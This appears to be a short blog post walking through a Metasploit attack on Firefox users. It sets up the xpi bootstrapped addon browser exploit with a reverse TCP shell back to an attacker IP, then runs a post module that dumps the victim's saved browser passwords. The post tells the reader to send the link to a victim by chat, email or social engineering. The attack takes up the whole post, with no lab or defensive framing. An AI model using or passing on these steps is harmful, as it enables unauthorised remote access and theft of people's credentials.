Open Kali terminal type msfconsole
Now type use
exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local
Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit
Send
the link of the server to the victim via chat or email or any social
engineering technique. Now you have access to the victims PC
Once
we have the shell, we simply run the post module to dump the credentials to a
file
Now type use
post/firefox/gather/passwords
msf exploit (passwords)
set payload firefox/shell_reverse_tcp
msf exploit (passwords)>set lhost 192.168.1.9 (IP of Local
Host)
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit
Result
will stored on your local computer
/root/.msf4/loot/
A
look at the result, you will see data like
0 comments:
Post a Comment